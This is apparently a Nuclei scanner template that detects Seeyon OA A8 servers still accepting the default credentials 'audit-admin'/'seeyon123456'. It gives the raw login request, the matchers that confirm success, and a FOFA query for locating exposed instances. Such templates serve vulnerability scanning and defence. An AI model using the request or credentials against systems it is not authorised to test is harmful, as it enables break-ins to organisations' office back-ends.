id: seeyon-a8-default-login

info:
  name: Seeyon OA A8 - Default Login
  author: SleepingBag945
  severity: high
  description: |
    Seeyon (seeyon) OA A8+ Enterprise Edition has a weak password vulnerability, which can be used to log in to the background
  metadata:
    verified: true
    max-request: 1
    fofa-query: app="致远互联-OA"
  tags: seeyon,oa,default-login

http:
  - raw:
      - |
        POST /seeyon/rest/authentication/ucpcLogin HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        UserAgentFrom=iphone&login_username={{username}}&login_password={{password}}

    payloads:
      username:
        - 'audit-admin'
      password:
        - 'seeyon123456'
    attack: pitchfork

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "\"LoginOK\":\"ok\""
          - "audit-admin"
        condition: and

      - type: word
        part: header
        words:
          - "application/json"

      - type: status
        status:
          - 200
# digest: 490a0046304402207b4c211522696b4754e4c800448765a7b31d2ebb0aa42c40e970aaa4696112d0022061357dbdc2dbf306e23f2b8a571d623409db37793a8b57392f958c5af987bd46:922c64590222798bb761d5b6d8e72950